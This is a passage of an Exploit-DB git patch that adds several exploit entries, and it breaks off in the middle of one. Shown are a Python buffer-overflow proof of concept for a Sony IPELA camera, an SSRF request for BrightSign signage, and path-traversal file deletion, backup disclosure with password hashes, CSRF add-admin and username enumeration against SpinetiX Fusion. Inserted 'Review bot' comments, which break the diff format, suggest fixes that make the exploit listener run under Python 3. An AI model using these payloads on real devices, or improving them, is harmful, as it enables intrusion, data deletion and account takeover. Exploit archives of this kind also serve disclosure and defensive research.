From f697a81a18f3eddacbdb3a2192f66bd28b2e739d Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Fri, 2 Oct 2020 05:02:08 +0000 Subject: [PATCH] DB: 2020-10-02 12 changes to exploits/shellcodes Sony IPELA Network Camera 1.82.01 - 'ftpclient.cgi' Remote Stack Buffer Overflow BrightSign Digital Signage Diagnostic Web Server 8.2.26 - Server-Side Request Forgery (Unauthenticated) BrightSign Digital Signage Diagnostic Web Server 8.2.26 - File Delete Path Traversal SpinetiX Fusion Digital Signage 3.4.8 - Database Backup Disclosure SpinetiX Fusion Digital Signage 3.4.8 - Cross-Site Request Forgery (Add Admin) SpinetiX Fusion Digital Signage 3.4.8 - Username Enumeration MonoCMS Blog 1.0 - Arbitrary File Deletion (Authenticated) WebsiteBaker 2.12.2 - 'display_name' SQL Injection (authenticated) GetSimple CMS 3.3.16 - Persistent Cross-Site Scripting (Authenticated) CMS Made Simple 2.2.14 - Persistent Cross-Site Scripting (Authenticated) Typesetter CMS 5.1 - 'Site Title' Persistent Cross-Site Scripting Exhibitor Web UI 1.7.1 - Remote Code Execution --- exploits/hardware/remote/48842.py | 91 +++++++++++++++++++++++++++++ exploits/hardware/webapps/48843.txt | 49 ++++++++++++++++ exploits/hardware/webapps/48844.txt | 83 ++++++++++++++++++++++++++ exploits/hardware/webapps/48845.txt | 73 +++++++++++++++++++++++ exploits/hardware/webapps/48846.txt | 57 ++++++++++++++++++ exploits/hardware/webapps/48847.txt | 60 +++++++++++++++++++ exploits/java/webapps/48654.txt | 86 +++++++++++++++++++++++++++ exploits/php/webapps/48848.txt | 53 +++++++++++++++++ exploits/php/webapps/48849.txt | 46 +++++++++++++++ exploits/php/webapps/48850.txt | 57 ++++++++++++++++++ exploits/php/webapps/48851.txt | 31 ++++++++++ exploits/php/webapps/48852.txt | 43 ++++++++++++++ files_exploits.csv | 12 ++++ 13 files changed, 741 insertions(+) create mode 100755 exploits/hardware/remote/48842.py create mode 100644 exploits/hardware/webapps/48843.txt create mode 100644 exploits/hardware/webapps/48844.txt create mode 100644 exploits/hardware/webapps/48845.txt create mode 100644 
exploits/hardware/webapps/48846.txt
create mode 100644 exploits/hardware/webapps/48847.txt
create mode 100644 exploits/java/webapps/48654.txt
create mode 100644 exploits/php/webapps/48848.txt
create mode 100644 exploits/php/webapps/48849.txt
create mode 100644 exploits/php/webapps/48850.txt
create mode 100644 exploits/php/webapps/48851.txt
create mode 100644 exploits/php/webapps/48852.txt
diff --git a/exploits/hardware/remote/48842.py b/exploits/hardware/remote/48842.py
new file mode 100755
index 000000000..b73ad7657
--- /dev/null
+++ b/exploits/hardware/remote/48842.py
@@ -0,0 +1,91 @@
+# Exploit Title: Sony IPELA Network Camera 1.82.01 - 'ftpclient.cgi' Remote Stack Buffer Overflow
+# Google Dork: Server: Mida eFramework
+# Date: 2020-09-30
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://pro.sony
+# Version: <= 1.82.01
+
+#!/usr/bin/env python
+#
+#
+# Sony IPELA Network Camera (ftpclient.cgi) Remote Stack Buffer Overflow
+#
+#
+# Vendor: Sony Electronics Inc.
+# Product web page: https://pro.sony
+# Affected version: SNC-DH120T v1.82.01
+#
+#
+# Summary: IPELA is Sony's vision of the ultimate workplace, designed to revolutionize
+# the way business communicates over global IP networks. IPELA products can improve the
+# efficiency of your organization by connecting people and places with high-quality audio
+# and video. The SNC-DH120T is an indoor tamper proof, high definition (720p) minidome
+# network security camera with Electronic Day/Night settings, DEPA analysis and is ONVIF
+# compliant. It supports dual streaming of H.264, MPEG-4 and JPEG at full frame-rate.
+#
+# Desc: The vulnerability is caused due to a boundary error in the processing of received
+# FTP traffic through the FTP client functionality (ftpclient.cgi), which can be exploited
+# to cause a stack-based buffer overflow when a user issues a POST request to connect to a
+# malicious FTP server. Successful exploitation could allow execution of arbitrary code on
+# the affected device or cause denial of service scenario.
+#
+# Tested on: gen5th/1.x
+#
+#
+# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+# @zeroscience
+#
+#
+# Advisory ID: ZSL-2020-5596
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5596.php
+# Fixed in 1.88.0.0: https://pro.sony/en_NL/support-resources/snc-dh120/software/mpengb00000928
+#
+#
+# 28.10.2019
+#
+
+
+# PoC:
+
+# Trigger:
+# curl 'http://10.0.0.3:5080/command/ftpclient.cgi' \
+# -H 'Connection: keep-alive' \
+# -H 'Cache-Control: max-age=0' \
+# -H 'Authorization: Basic YWRtaW46YWRtaW4=' \
+# -H 'Upgrade-Insecure-Requests: 1' \
+# -H 'Origin: http://10.0.0.3:5080' \
+# -H 'Content-Type: application/x-www-form-urlencoded' \
+# -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.92 Safari/537.36' \
+# -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' \
+# -H 'Referer: http://81.83.17.200:5080/en/l4/ftp/common.html' \
+# -H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
+# --data 'FtpClientFunc=on&FcServerName=10.0.0.5&FcUserName=EVIL&FcPassword=NONESO&FcPassive=off&reload=referer' \
+# --compressed \
+# --insecure
+#
+#
+
+# Observed fixed version log:
+# 2020-07-27 17:48:03 FTP client Unexpected error occurred during FTP client operation.
+#
+
+
+import socket
+
+HOST = '127.0.0.1' # 10.0.0.5
+PORT = 21
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.bind((HOST, PORT))
+s.listen(1)
+conn, addr = s.accept()
+print 'Connection from', addr
+while True:
+    data = conn.recv(1024)
+    if not data:
+        break
+    evil = "A" * 100000
+    evil += "B" * 10000
+    evil += "C" * 1000
+    conn.sendall(evil+'\n')
+    s.close()
\ No newline at end of file
diff --git a/exploits/hardware/webapps/48843.txt b/exploits/hardware/webapps/48843.txt
new file mode 100644
index 000000000..cd802da0d
--- /dev/null
+++ b/exploits/hardware/webapps/48843.txt
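Review bot: The listener script is Python 2 only (`print 'Connection from', addr` and the str concatenation in `conn.sendall(evil+'\n')` both fail under Python 3), and the `#!/usr/bin/env python` shebang sits after six header comment lines, so the loader never sees it; either move it to line 1 or drop it, and use `print('Connection from', addr)` / `conn.sendall((evil + '\n').encode())` if Python 3 is the intended interpreter. The `s.close()` at the end of the `while` loop appears to close the listening socket on every iteration rather than the accepted `conn`, which is never closed; a `try/finally` around the loop that calls `conn.close()` and `s.close()` once would be the cleanup intended. The `evil` buffer is rebuilt on every pass through the loop although nothing in it varies, so it can be assembled once above `while True:`. As documentation, the header already names the fixed firmware (`Fixed in 1.88.0.0`), which is the useful line for anyone triaging this entry.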
@@ -0,0 +1,49 @@
+# Exploit Title: BrightSign Digital Signage Diagnostic Web Server 8.2.26 - Server-Side Request Forgery (Unauthenticated)
+# Date: 2020-09-30
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://www.brightsign.biz
+# Version: <= 8.2.26
+
+BrightSign Digital Signage Diagnostic Web Server 8.2.26 Unauthenticated SSRF
+
+
+Vendor: BrightSign, LLC
+Product web page: https://www.brightsign.biz
+Affected version: Model: XT, XD, HD, LS
+ Firmware / OS version: <=8.2.26
+
+
+Summary: BrightSign designs media players and provides free software
+and cloud networking solutions for the commercial digital signage market
+worldwide, serving all vertical segments of the marketplace.
+
+Desc: Unauthenticated Server-Side Request Forgery (SSRF) vulnerability
+exists in the BrightSign digital signage media player affecting the
+Diagnostic Web Server (DWS). The application parses user supplied data
+in the 'url' GET parameter to construct a diagnostics request to the
+Download Speed Test service. Since no validation is carried out on the
+parameter, an attacker can specify an external domain and force the
+application to make an HTTP request to an arbitrary destination host.
+This can be used by an external attacker for example to bypass firewalls
+and initiate a service and network enumeration on the internal network
+through the affected application.
+
+Tested on: roNodeJS
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2020-5595
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5595.php
+
+
+01.08.2020
+
+--
+
+
+PoC:
+
+# curl http://10.0.0.17/speedtest?url=127.0.0.1:22
\ No newline at end of file
diff --git a/exploits/hardware/webapps/48844.txt b/exploits/hardware/webapps/48844.txt
new file mode 100644
index 000000000..0111d1656
--- /dev/null
+++ b/exploits/hardware/webapps/48844.txt
@@ -0,0 +1,83 @@ +# Exploit Title: SpinetiX Fusion Digital Signage 3.4.8 - File Delete Path Traversal +# Date: 2020-09-30 +# Exploit Author: LiquidWorm +# Vendor Homepage: https://www.spinetix.com +# Version: <= 8.2.26 + +SpinetiX Fusion Digital Signage 3.4.8 File Backup/Delete Path Traversal + + +Vendor: SpinetiX AG +Product web page: https://www.spinetix.com +Affected version: <= 3.4.8 (1.0.36274) + +Summary: At SpinetiX we inspire businesses to unlock the potential of their story. +We believe in the power of digital signage as a dynamic new storytelling platform +to engage with people. For more than 13 years, we have been constantly innovating +to deliver cutting-edge digital signage solutions that help our customers shine. +Fusion is a built-in content management application accessible from a standard web +browser - it is pre-installed on every HMP200, HMP130, and HMP100 device, and does +not require any additional license, cost, or software installation. + +Desc: The application suffers from an authenticated path traversal vulnerability. +Input passed via several parameters in index.php script is not properly verified +before being used to create and delete files. This can be exploited to write backup +files to an arbitrary location and/or delete arbitrary files via traversal attacks. 
+ +Tested on: Apache 2.2.34 + PHP/5.3.18-2 + Linux 2.6.10 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2020-5594 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5594.php + + +03.08.2020 + +-- + + +File Backup Path Traversal: +--------------------------- + +POST /fusion/index.php?r=backup/create HTTP/1.1 +Host: 192.168.1.1 +Content-Length: 62 +Accept: */* +X-Requested-With: XMLHttpRequest +User-Agent: Mooshoo/1.2 +Content-Type: application/x-www-form-urlencoded +Origin: http://192.168.1.1 +Referer: http://192.168.1.1/fusion/index.php?r=settings/settings +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: fusionsess=vb5se309b2seig780p47ch0pn1 +Connection: close + +SystemBackup%5Bname%5D=..%2Ftest&SystemBackup%5Bbackupall%5D=0 + + +File Delete (test.7z) Path Traversal: +------------------------------------- + +GET /fusion/index.php?r=backup/delete&id=backup%3A../test&_=1600981467420 HTTP/1.1 +Host: 192.168.1.1 + + +Arbitrary File Delete Null Terminated String Extension Bypass Path Traversal: +----------------------------------------------------------------------------- + +GET /fusion/index.php?r=backup/delete&id=backup%3A../scripts/layouttheme.js%00&_=1600981467420 HTTP/1.1 +Host: 192.168.1.1 + + +Arbitrary Image Delete: +----------------------- + +GET /fusion/index.php?r=files/delete&id=image%3A../dirtysecret.svg&_=1601128841154 HTTP/1.1 +Host: 192.168.1.1 \ No newline at end of file diff --git a/exploits/hardware/webapps/48845.txt b/exploits/hardware/webapps/48845.txt new file mode 100644 index 000000000..f5e9416d2 --- /dev/null +++ b/exploits/hardware/webapps/48845.txt 
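Review bot: The `# Version: <= 8.2.26` header line in this file contradicts its own `Affected version: <= 3.4.8 (1.0.36274)` a few lines below; 8.2.26 is the BrightSign firmware version from 48843.txt and looks like a copy-paste carry-over. The same header mismatch is present in 48845.txt and 48846.txt (and apparently 48847.txt, whose hunk runs past the end of this chunk). Since the header block is what the CSV index and version-matching tooling key on, each of these should read `# Version: <= 3.4.8`.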
@@ -0,0 +1,73 @@ +# Exploit Title: SpinetiX Fusion Digital Signage 3.4.8 - Database Backup Disclosure +# Date: 2020-09-30 +# Exploit Author: LiquidWorm +# Vendor Homepage: https://www.spinetix.com +# Version: <= 8.2.26 + +SpinetiX Fusion Digital Signage 3.4.8 Database Backup Disclosure + + +Vendor: SpinetiX AG +Product web page: https://www.spinetix.com +Affected version: <= 3.4.8 (1.0.36274) + +Summary: At SpinetiX we inspire businesses to unlock the potential of their story. +We believe in the power of digital signage as a dynamic new storytelling platform +to engage with people. For more than 13 years, we have been constantly innovating +to deliver cutting-edge digital signage solutions that help our customers shine. +Fusion is a built-in content management application accessible from a standard web +browser - it is pre-installed on every HMP200, HMP130, and HMP100 device, and does +not require any additional license, cost, or software installation. + +Desc: The application is vulnerable to unauthenticated database download and information +disclosure vulnerability. This can enable an attacker to disclose sensitive information +resulting in authentication bypass, session hijacking and full system control. 
+ +Tested on: Apache 2.2.34 + PHP/5.3.18-2 + Linux 2.6.10 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2020-5593 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5593.php + + +03.08.2020 + +-- + + +Request: +-------- + +GET /content/files/backups/ HTTP/1.0 +Host: 192.168.1.1 + +Response: +--------- + +HTTP/1.1 200 OK +Date: Wed, 26 Aug 2020 15:57:40 GMT +Server: Apache/2.2.22 (Unix) +X-spinetix-firmware: 3.0.6-1.0.21932 +X-raperca-version: 3.0.6-1.0.21912 +X-spinetix-serial: 001d400027b8 +X-spinetix-hw: BonsaiT +Content-Length: 636 +Connection: close +Content-Type: text/html;charset=UTF-8 + + +Index of /content/files/backups +Name Last modified Size Description +Parent Directory - +Custom1337Name.7z 25-Aug-2020 10:06 1.0M + +Extracting the .7z shows userpwd.txt file, cat userpwd.txt: + +admin:e10adc3949ba59abbe56e057f20f883e:file,program,activate,layout,playlist,model,slide,edit,admin::0 +testingus:b874da212a62786181c66c5bbaabf425:file,program,activate,layout,playlist,model,slide,edit,admin:se:1 \ No newline at end of file diff --git a/exploits/hardware/webapps/48846.txt b/exploits/hardware/webapps/48846.txt new file mode 100644 index 000000000..c8bc6737c --- /dev/null +++ b/exploits/hardware/webapps/48846.txt 
@@ -0,0 +1,57 @@ +# Exploit Title: SpinetiX Fusion Digital Signage 3.4.8 - Cross-Site Request Forgery (Add Admin) +# Date: 2020-09-30 +# Exploit Author: LiquidWorm +# Vendor Homepage: https://www.spinetix.com +# Version: <= 8.2.26 + +SpinetiX Fusion Digital Signage 3.4.8 CSRF Add Admin Exploit + + +Vendor: SpinetiX AG +Product web page: https://www.spinetix.com +Affected version: <= 3.4.8 (1.0.36274) + +Summary: At SpinetiX we inspire businesses to unlock the potential of their story. +We believe in the power of digital signage as a dynamic new storytelling platform +to engage with people. For more than 13 years, we have been constantly innovating +to deliver cutting-edge digital signage solutions that help our customers shine. +Fusion is a built-in content management application accessible from a standard web +browser - it is pre-installed on every HMP200, HMP130, and HMP100 device, and does +not require any additional license, cost, or software installation. + +Desc: The application interface allows users to perform certain actions via HTTP +requests without performing any validity checks to verify the requests. This can +be exploited to perform certain actions with administrative privileges if a logged-in +user visits a malicious web site. + +Tested on: Apache 2.2.34 + PHP/5.3.18-2 + Linux 2.6.10 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2020-5592 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5592.php + + +03.08.2020 + +-- + + + + + +
+ + + + + + +
+ + \ No newline at end of file diff --git a/exploits/hardware/webapps/48847.txt b/exploits/hardware/webapps/48847.txt new file mode 100644 index 000000000..32580193c --- /dev/null +++ b/exploits/hardware/webapps/48847.txt @@ -0,0 +1,60 @@ +# Exploit Title: SpinetiX Fusion Digital Signage 3.4.8 - Username Enumeration +# Date: 2020-09-30 +# Exploit Author: LiquidWorm +# Vendor Homepage: https://www.spinetix.com +# Version: <= 8.2.26 + +SpinetiX Fusion Digital Signage 3.4.8 Username Enumeration Weakness + + +Vendor: SpinetiX AG +Product web page: https://www.spinetix.com +Affected version: <= 3.4.8 (1.0.36274) + +Summary: At SpinetiX we inspire businesses to unlock the potential of their story. +We believe in the power of digital signage as a dynamic new storytelling platform +to engage with people. For more than 13 years, we have been constantly innovating +to deliver cutting-edge digital signage solutions that help our customers shine. +Fusion is a built-in content management application accessible from a standard web +browser - it is pre-installed on every HMP200, HMP130, and HMP100 device, and does +not require any additional license, cost, or software installation. + +Desc: The weakness is caused due to the login script and how it verifies provided +credentials. Attacker can use this weakness to enumerate valid users on the affected +node. + +Tested on: Apache 2.2.34 + PHP/5.3.18-2 + Linux 2.6.10 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2020-5591 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5591.php + + +03.08.2020 + +-- + + +POST /fusion/index.php?r=users/login HTTP/1.1 +Host: 192.168.1.1 + +User[username]=NonExisting&User[password]=blah&User[rememberMe]=0&yt0.x=0&yt0.y=0 + +Response: Username is incorrect. +HTML:
Username is incorrect.
+ +--- + +POST /fusion/index.php?r=users/login HTTP/1.1 +Host: 192.168.1.1 + +User[username]=admin&User[password]=blah&User[rememberMe]=0&yt0.x=0&yt0.y=0 + +Response: Password is incorrect. +HTML: